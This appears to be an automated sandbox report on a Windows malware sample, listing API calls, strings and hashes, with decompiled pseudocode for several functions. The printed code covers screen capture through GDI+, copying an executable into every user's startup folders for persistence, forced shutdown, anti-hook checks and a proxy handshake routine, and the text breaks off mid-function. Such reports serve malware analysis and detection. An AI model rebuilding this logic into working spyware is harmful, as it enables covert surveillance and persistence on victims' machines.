0x00411864
0x00000000
0x00000000
0x0041186f
0x00411877
0x00411884
0x00411890
0x0041189d
0x004118aa
0x004118b7
0x004118c4
0x004118d1
0x004118d4
0x004118d6
0x004118db
0x00000000
0x0041191f
0x0041191f
0x00411923
0x00411927
0x00411928
0x0041192f
0x00411932
0x00411935
0x0041193d
0x00000000
0x00000000
0x0041194d
0x0041194f
0x00411954
0x00411bf0
0x00411bf3
0x00000000
0x00411bf3
0x0041195b
0x0041195e
0x00411963
0x00411bea
0x00411bed
0x00000000
0x00411bed
0x00411978
0x0041197e
0x00411983
0x004119ad
0x004119ad
0x00000000
0x00411985
0x00411995
0x004119a5
0x004119a5
0x004119ab
0x004119b1
0x004119b4
0x004119b7
0x004119c4
0x004119cc
0x004119d1
0x004119b9
0x004119b9
0x004119bc
0x004119bc
0x004119db
0x004119de
0x004119e3
0x00411be4
0x00411be7
0x00000000
0x004119e9
0x004119ed
0x004119f0
0x004119f5
0x00411bde
0x00411be1
0x00000000
0x00411be1
0x004119fb
0x004119fd
0x00411a02
0x00411a0d
0x00411a11
0x00411a16
0x00411a19
0x00411a19
0x00411a1c
0x00411a1e
0x00411a1e
0x00411a21
0x00411a21
0x00411a24
0x00411a26
0x00411a26
0x00411a24
0x00411a29
0x00411a2e
0x00411a2f
0x00411a30
0x00411a33
0x00411a36
0x00411a37
0x00411a38
0x00411a39
0x00411a41
0x00411bd5
0x00411bdb
0x00000000
0x00411a47
0x00411a4a
0x00411a5b
0x00411a5e
0x00411a64
0x00411a6c
0x00411a6c
0x00411a75
0x00411a76
0x00411a77
0x00411a7a
0x00411a82
0x00000000
0x00411a91
0x00411a94
0x00411a98
0x00411a99
0x00411a9c
0x00411aa4
0x00411bcf
0x00411bd2
0x00000000
0x00411bd2
0x00411aaa
0x00411aaf
0x00000000
0x00411abe
0x00411ac3
0x00411ac5
0x00411aca
0x00000000
0x00000000
0x00411ad0
0x00411ad1
0x00411ad4
0x00411adc
0x00411b1a
0x00411b1d
0x00411b25
0x00411b2e
0x00411b32
0x00411b33
0x00411b39
0x00411b48
0x00411b51
0x00411b61
0x00411b6f
0x00411b80
0x00411b90
0x00411b94
0x00411b94
0x00411bae
0x00411bb3
0x00411bb6
0x00411bcc
0x00411bb8
0x00411bbb
0x00411bbe
0x00411bbe
0x00411bb6
0x00411b39
0x00000000
0x00411b25
0x00411ade
0x00411ae3
0x00000000
0x00000000
0x00411ae5
0x00411ae8
0x00411af7
0x00411af8
0x00411afe
0x00000000
0x00000000
0x00000000
0x00411b00
0x00411b12
0x00411b17
0x00000000
0x00411b17
0x00411aaf
0x00411a82
0x00411a41
0x004119e3
0x00000000
0x004119ab
0x00411983
0x004118db

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 004117AB
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004117BC
GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 004117C9
GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 004117D6
GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 004117E3
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 004117F0
GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 004117FD
GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0041180A
LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 00411852
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041185D
LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0041186F
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041187A
GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00411886
GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 00411893
GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 004118A0
GetProcAddress.KERNEL32(?,SelectObject), ref: 004118AD
GetProcAddress.KERNEL32(?,BitBlt), ref: 004118BA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 004118C7
GetProcAddress.KERNEL32(?,DeleteDC), ref: 004118D4
LoadImageW.USER32 ref: 00411978
GetIconInfo.USER32(00000000,?), ref: 0041198D
GetCursorPos.USER32(?,?,?,?), ref: 0041199B
DrawIcon.USER32 ref: 00411A6C
lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 00411AED
FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 00411C04
FreeLibrary.KERNEL32(?,?,?,?), ref: 00411C0E
FreeLibrary.KERNEL32(?,?,?,?), ref: 00411C18

Strings

BitBlt, xrefs: 004118AF
gdiplus.dll, xrefs: 0041178D
GetDeviceCaps, xrefs: 00411895
GdiplusStartup, xrefs: 004117B3
ole32.dll, xrefs: 0041184D
CreateStreamOnHGlobal, xrefs: 00411854
DeleteDC, xrefs: 004118C9
CreateCompatibleBitmap, xrefs: 00411888
gdi32.dll, xrefs: 0041186A
GdipGetImageEncodersSize, xrefs: 004117E5
GdipCreateBitmapFromHBITMAP, xrefs: 004117CB
DISPLAY, xrefs: 00411946
GdiplusShutdown, xrefs: 004117BE
DeleteObject, xrefs: 004118BC
SelectObject, xrefs: 004118A2
GdipGetImageEncoders, xrefs: 004117F2
CreateDCW, xrefs: 00411871
GdipSaveImageToStream, xrefs: 004117FF
CreateCompatibleDC, xrefs: 0041187C
GdipDisposeImage, xrefs: 004117D8

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: fea4aa82a547a5a4290b9fea2ec24b9fb75146eb20ddf00801b57ce3d5729be1
Instruction ID: 0e094e399ddef241c5d2713891e089f1b57298588d542dc69b965a403b3f8512
Opcode Fuzzy Hash: fea4aa82a547a5a4290b9fea2ec24b9fb75146eb20ddf00801b57ce3d5729be1
Instruction Fuzzy Hash: 31E1D6B1D00259ABCF209FE5CC84AEEBBB9FF04341F14446BE615B2260E7799A91CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5BB, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040F5BB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
				char _v536;
				char _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				char _v764;
				short _v772;
				int _v776;
				int _v780;
				void _v781;
				void* _v784;
				char _v785;
				void _v788;
				void _v789;
				void* _v792;
				char _v793;
				char _v797;
				void* _v800;
				void* _v804;
				void* _v808;
				char _v809;
				int _v813;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t74;
				int _t79;
				intOrPtr* _t80;
				int _t82;
				void* _t84;
				int _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				int _t130;
				void* _t145;
				void* _t147;
				void* _t167;

				_t167 = __fp0;
				_t136 = __ecx;
				_t149 =  &_v764;
				_v781 = 0;
				if(E0041B5BF(0, __ecx,  &_v764,  *0x422bf4) != 0) {
					_v780 = _v760;
					_t130 = E0040F229( &_v780, __ecx, _v764);
					_v776 = _t130;
					if(_t130 == 0) {
						_v780 = 0;
					}
					E0041B667( &_v764);
				}
				if(_v780 != 0x1e6) {
					__eflags = _v780 - 0xc;
					if(__eflags != 0) {
						L41:
						E004163A8(_v772);
						return _v785;
					}
					_t74 = E0040EDBB(_t136, __eflags, 0x8889347b, 2);
					_v776 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E00417E0D(0, _t149,  *0x422bf4);
						}
						goto L41;
					}
					E0040ED80(0x19367401,  &_v748, 1);
					_t79 = E00419B8B( &_v760);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x422b9c; // 0x0
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							_v789 = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)(_v780 + 4)));
								_t84 = E0041C7BF(_t136, E00408FD1,  *((intOrPtr*)(_v780 + 8)));
								_t149 = 0x422bf8;
								_v797 = E00408FD1(_t84, 0, 0x422bf8,  &_v540, E00408FD1, 0x422bf8, _t167);
								L30:
								__eflags = _v793 - 1;
								if(_v793 == 1) {
									_t88 = E00417C6F( &_v536, 0, _t149, 0,  &_v776);
									__eflags = _t88;
									_v813 = _t88 != 0;
									__eflags = _v813;
									if(_v813 != 0) {
										E0040ED80(0x1a43533f,  &_v760, 1);
										_t92 = CreateEventW(0x422bd0, 1, 0,  &_v772);
										_t145 = _v788;
										_v804 = _t92;
										_v800 = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2,  &_v792, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags = _v792;
										if(_v792 != 0) {
											CloseHandle(_v792);
										}
										CloseHandle(_v772);
										CloseHandle(_t145);
									}
								}
								L38:
								E00419B7B(_v780);
								goto L39;
							}
							__eflags = _v789 - 0xe9;
							if(_v789 != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x423006, 0x78f16360,  &_v788);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)(_v784 + 4)));
							E0041C7BF(_t136, E0040933D,  *_v784);
							_push(_a4);
							_t149 = 0x422bf8;
							_push( &_v544);
							_v809 = E0040933D( &_v544, _v800, 0x422bf8, 0x422bf8, _t167);
							VirtualFree(_v808, 0, 0x8000);
							goto L30;
						}
						_v789 = E0040969D(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v781 = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags = _v781 - 0xe9;
						if(_v781 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E00409286(_t136, _v772) != 0) {
					E0040ED80(0x32901130,  &_v748, 1);
					_t113 = CreateMutexW(0x422bd0, 1,  &_v760);
					_v792 = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle(_v780);
							_v780 = 0;
						}
						if(_v780 != 0) {
							E00413E8F(_t136,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x422b98 =  *0x422b98 | 0x00000010;
							}
							E00415AB4();
							if(( *0x422b98 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E0040ED80(0x1a43533f,  &_v748, 1);
							_t147 = OpenEventW(2, 0,  &_v760);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E0040F2E6(1);
							_v785 = 1;
							CloseHandle(_v784);
						}
					}
				}
				goto L41;
			}

0x0040f5bb
0x0040f5bb
0x0040f5d4
0x0040f5d8
0x0040f5e3
0x0040f5ed
0x0040f5f5
0x0040f5fa
0x0040f600
0x0040f602
0x0040f602
0x0040f60a
0x0040f60a
0x0040f617
0x0040f703
0x0040f708
0x0040f8ec
0x0040f8f0
0x0040f8ff
0x0040f8ff
0x0040f715
0x0040f71a
0x0040f71e
0x0040f720
0x0040f8db
0x0040f8db
0x0040f8df
0x0040f8e7
0x0040f8e7
0x00000000
0x0040f8df
0x0040f732
0x0040f73c
0x0040f741
0x0040f74d
0x0040f74f
0x0040f77a
0x0040f77a
0x0040f783
0x0040f789
0x0040f78c
0x0040f7a7
0x0040f7ab
0x0040f7ad
0x0040f7af
0x0040f812
0x0040f816
0x0040f821
0x0040f826
0x0040f839
0x0040f83d
0x0040f83d
0x0040f842
0x0040f858
0x0040f85d
0x0040f85f
0x0040f864
0x0040f868
0x0040f876
0x0040f888
0x0040f88e
0x0040f892
0x0040f896
0x0040f89a
0x0040f89c
0x0040f89e
0x0040f8b1
0x0040f8a0
0x0040f8a1
0x0040f8a1
0x0040f8b7
0x0040f8bd
0x0040f8c1
0x0040f8c7
0x0040f8c7
0x0040f8cd
0x0040f8d0
0x0040f8d0
0x0040f868
0x0040f8d2
0x0040f8d6
0x00000000
0x0040f8d6
0x0040f7b1
0x0040f7b6
0x00000000
0x00000000
0x0040f7c7
0x0040f7c9
0x0040f7cc
0x00000000
0x00000000
0x0040f7d2
0x0040f7dc
0x0040f7e1
0x0040f7ef
0x0040f7f4
0x0040f806
0x0040f80a
0x00000000
0x0040f80a
0x0040f793
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f751
0x0040f751
0x0040f75c
0x0040f760
0x0040f762
0x0040f764
0x00000000
0x00000000
0x0040f766
0x0040f76b
0x00000000
0x00000000
0x0040f76d
0x0040f772
0x0040f772
0x0040f751
0x0040f628
0x0040f63a
0x0040f64b
0x0040f651
0x0040f657
0x0040f66e
0x0040f674
0x0040f676
0x0040f676
0x0040f67e
0x0040f68c
0x0040f699
0x0040f69b
0x0040f69b
0x0040f6a2
0x0040f6ae
0x0040f6b7
0x0040f6b7
0x0040f6c9
0x0040f6dc
0x0040f6e0
0x0040f6e3
0x0040f6ea
0x0040f6ea
0x0040f6ee
0x0040f6f7
0x0040f6fc
0x0040f6fc
0x0040f67e
0x0040f657
0x00000000

APIs

Part of subcall function 0041B5BF: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5E4
Part of subcall function 0041B5BF: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5F7

CreateMutexW.KERNEL32(00422BD0,00000001,?,32901130,?,00000001,?), ref: 0040F64B
GetLastError.KERNEL32 ref: 0040F65D
CloseHandle.KERNEL32(000001E6), ref: 0040F674
ExitWindowsEx.USER32(00000014,80000000), ref: 0040F6B7
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 0040F6D6
SetEvent.KERNEL32(00000000), ref: 0040F6E3
CloseHandle.KERNEL32(00000000), ref: 0040F6EA
CloseHandle.KERNEL32(000001E6,00000001), ref: 0040F6FC
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 0040F760
Sleep.KERNEL32(000001F4), ref: 0040F772
IsWellKnownSid.ADVAPI32(00000000,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 0040F783
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0040F7AB
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 0040F80A
GetFileAttributesExW.KERNEL32(00423006,78F16360,0000000C), ref: 0040F7C7

Part of subcall function 0041C7BF: VirtualProtect.KERNEL32(00408FD1,?,00000040,00000000,74B5F9B0,?,?,0040F826,?,?), ref: 0041C7D4
Part of subcall function 0041C7BF: VirtualProtect.KERNEL32(00408FD1,?,00000000,00000000,?,?,0040F826,?,?), ref: 0041C807

CreateEventW.KERNEL32(00422BD0,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,00422BF8,00000000,?,?,?), ref: 0040F888
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040F8A1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0040F8B1
CloseHandle.KERNEL32(0000000C), ref: 0040F8C7
CloseHandle.KERNEL32(?), ref: 0040F8CD
CloseHandle.KERNEL32(?), ref: 0040F8D0

Strings

, xrefs: 0040F691

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-3916222277
Opcode ID: fc35d0f2a6b0e39ddc484f75287a9a9850a765fa2851298bc798d6af90839615
Instruction ID: d88101fee22d02b781c5a5214e8f7285694ddfd058a9753d1bd1bdd84816f5d1
Opcode Fuzzy Hash: fc35d0f2a6b0e39ddc484f75287a9a9850a765fa2851298bc798d6af90839615
Instruction Fuzzy Hash: 0291B131508341AFD720EF608D85EAF7BE8AF84304F40493EF984A22E1C7798949DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 0040969D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040969D(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E0040FA33(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0040F9FD(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00416EF7(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E00416749(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0040E4C6( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E0041BC2F( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E0041B9B1( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0041A858(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E00408D9C( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E00408EC9( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0041A858(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E00408D9C(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x004096ab
0x004096b3
0x004096b6
0x004096c4
0x004096c8
0x00409765
0x00000000
0x004096ce
0x004096ce
0x004096d6
0x004096df
0x004096e7
0x004096ec
0x004096ed
0x004096f3
0x004096f4
0x00409700
0x00409702
0x00409710
0x00409718
0x0040971a
0x00409720
0x00409726
0x0040973b
0x00409740
0x00409750
0x00409755
0x00409755
0x0040973b
0x00409718
0x00409700
0x0040975a
0x00409763
0x0040976c
0x0040976f
0x00409772
0x00409777
0x0040978d
0x00409790
0x00409796
0x00409799
0x0040979b
0x004097a8
0x004097a8
0x004097ab
0x00000000
0x00000000
0x004097b1
0x004097b3
0x004097b6
0x00409872
0x00409875
0x00000000
0x00000000
0x00000000
0x00000000
0x004097bc
0x004097bc
0x004097c9
0x004097cf
0x004097d1
0x004097d7
0x004097da
0x004097dc
0x004097e2
0x004097ec
0x004097f1
0x004097f3
0x00409803
0x00409808
0x0040980a
0x00409813
0x00409818
0x0040981a
0x00409833
0x00409835
0x00409845
0x00409847
0x00409856
0x0040985a
0x0040985a
0x00409847
0x00409835
0x0040981a
0x0040980a
0x00409862
0x00409862
0x004097dc
0x00409868
0x00409869
0x00409869
0x00000000
0x004097bc
0x0040979d
0x004097a2
0x00000000
0x00000000
0x00000000
0x0040987b
0x0040987b
0x0040987b
0x00409888
0x00409899
0x0040989f
0x004098a1
0x004098ba
0x004098bc
0x004098c7
0x004098cc
0x004098ce
0x004098d0
0x004098d0
0x004098ce
0x004098bc
0x00000000
0x004098d4
0x00000000
0x00409763

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004096BE
GetProcAddress.KERNEL32(00000000,?), ref: 004096DF
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00409710
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00409733
FreeLibrary.KERNEL32(00000000), ref: 0040975A
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 00409790
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004097C9
NetApiBufferFree.NETAPI32(?,?,?), ref: 00409862
NetApiBufferFree.NETAPI32(?), ref: 00409875
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00409899

Strings

.exe, xrefs: 00409772, 0040981E, 004098A5

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: c6e7a88f488e9186a74ef96c2dc58423928d6ce12ce2fdb3197e43837b15b006
Instruction ID: 9d9262e4803212db9b5368070db02fb5b6626c9aaf9ba9f62b44393a68c558fa
Opcode Fuzzy Hash: c6e7a88f488e9186a74ef96c2dc58423928d6ce12ce2fdb3197e43837b15b006
Instruction Fuzzy Hash: CC615272910218AEDF10EB94CD84EEE777CAB05304F4045BAB651F3292E7399E498B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406095, Relevance: 18.7, APIs: 12, Instructions: 692
networkCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00406095(void* __eflags, char _a4) {
				signed int _v9;
				signed char _v13;
				signed int _v14;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed char _v53;
				signed char _v55;
				char _v56;
				signed char _v60;
				void* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				char _v80;
				char _v84;
				char _v88;
				signed char _v192;
				char _v208;
				signed char _v212;
				signed int _v214;
				signed int _v216;
				char _v232;
				signed int _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				signed int _v496;
				signed char _v600;
				signed char _v620;
				short _v624;
				signed short _v752;
				char _v880;
				char _v1000;
				intOrPtr _v1004;
				char _v1008;
				char _v1264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t254;
				signed int _t262;
				signed int _t263;
				void* _t271;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t277;
				void* _t278;
				signed char _t279;
				signed int _t280;
				void* _t283;
				signed int _t284;
				signed char _t286;
				signed int _t287;
				signed int _t291;
				signed int _t296;
				signed int _t312;
				signed int _t314;
				intOrPtr _t315;
				void* _t317;
				signed int _t319;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed short _t337;
				signed int _t341;
				signed int _t342;
				signed short _t353;
				signed int _t359;
				signed int _t361;
				signed char _t362;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t367;
				signed short _t371;
				signed int _t384;
				signed int _t388;
				signed int _t390;
				signed int _t393;
				signed char _t394;
				signed char _t395;
				void* _t398;
				signed int _t399;
				void* _t400;
				signed char _t401;
				signed char _t403;
				void* _t406;
				void* _t407;
				signed int _t408;
				void* _t416;
				char* _t417;
				signed char _t419;
				signed int _t422;
				char* _t430;
				intOrPtr _t441;
				intOrPtr _t448;
				signed char _t450;
				signed char _t451;
				void* _t454;
				intOrPtr* _t455;
				signed int _t457;
				intOrPtr _t458;
				signed int _t460;
				intOrPtr _t463;
				signed int _t465;
				signed int _t466;
				void* _t469;

				_t452 = _a4;
				_t254 = E00419960(_a4);
				_t403 = 0;
				_v44 = 0 | _t254 == 0x00000017;
				if(E0041935B(1, _a4,  &_v9, 0) == 0 || _v9 == 0 || E0041935B(_v9 & 0x000000ff, _t452,  &_v880, 0) == 0) {
					L46:
					__eflags = 0;
					return 0;
				} else {
					_t262 = _v9 & 0x000000ff;
					L5:
					L5:
					if(_t262 != _t403) {
						goto L4;
					} else {
						_t263 = 0;
					}
					L7:
					asm("sbb eax, eax");
					_v40 = ( ~_t263 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
					if(E004193D2( &_v40, _t452,  &_v40, 2) == 0) {
						goto L46;
					}
					if(_v40 == 0xff05) {
						return 1;
					}
					_push(_t403);
					_push( &_v56);
					_t271 = 4;
					_v13 = _t403;
					_t272 = E0041935B(_t271, _t452);
					__eflags = _t272;
					if(_t272 == 0) {
						goto L46;
					} else {
						__eflags = _v56 - 5;
						if(_v56 != 5) {
							goto L46;
						}
						__eflags = _v44 & 0x00000001;
						_t457 = 0x17;
						if((_v44 & 0x00000001) == 0) {
							_v76 = 2;
							_v72 = _t457;
						} else {
							_v76 = _t457;
							_v72 = 2;
						}
						_t274 = (_v53 & 0x000000ff) - 1;
						__eflags = _t274;
						_v32 = _t403;
						if(_t274 == 0) {
							_push(_t403);
							_push( &_v84);
							_t276 = 4;
							_t277 = E0041935B(_t276, _t452);
							__eflags = _t277;
							if(_t277 == 0) {
								goto L46;
							}
							_t278 = 0x10;
							_t279 = E00416378(_t278);
							_v32 = _t279;
							__eflags = _t279 - _t403;
							if(_t279 != _t403) {
								_t416 = 2;
								 *_t279 = _t416;
								_push(4);
								_t417 =  &_v84;
								_t280 = _t279 + 4;
								__eflags = _t280;
								goto L43;
							}
							goto L41;
						} else {
							_t384 = _t274;
							__eflags = _t384;
							if(_t384 == 0) {
								_t388 = E0041935B(1, _t452,  &_v14, _t403);
								__eflags = _t388;
								if(_t388 == 0) {
									goto L46;
								}
								__eflags = _v14 - _t403;
								if(_v14 == _t403) {
									goto L46;
								}
								_t390 = E0041935B(_v14 & 0x000000ff, _t452,  &_v1264, _t403);
								__eflags = _t390;
								if(_t390 == 0) {
									goto L46;
								}
								 *(_t469 + (_v14 & 0x000000ff) - 0x4ec) = _t403;
								_t393 =  &_v1264;
								_v60 = _t403;
								__imp__getaddrinfo(_t393, _t403, _t403,  &_v60);
								__eflags = _t393;
								if(_t393 == 0) {
									_t451 = 0;
									__eflags = 0;
									do {
										_t394 = _v60;
										__eflags = _t394 - _t403;
										if(_t394 == _t403) {
											goto L32;
										}
										_t448 =  *((intOrPtr*)(_t469 + (_t451 & 0x000000ff) * 4 - 0x48));
										while(1) {
											__eflags =  *((intOrPtr*)(_t394 + 4)) - _t448;
											if(__eflags == 0) {
												break;
											}
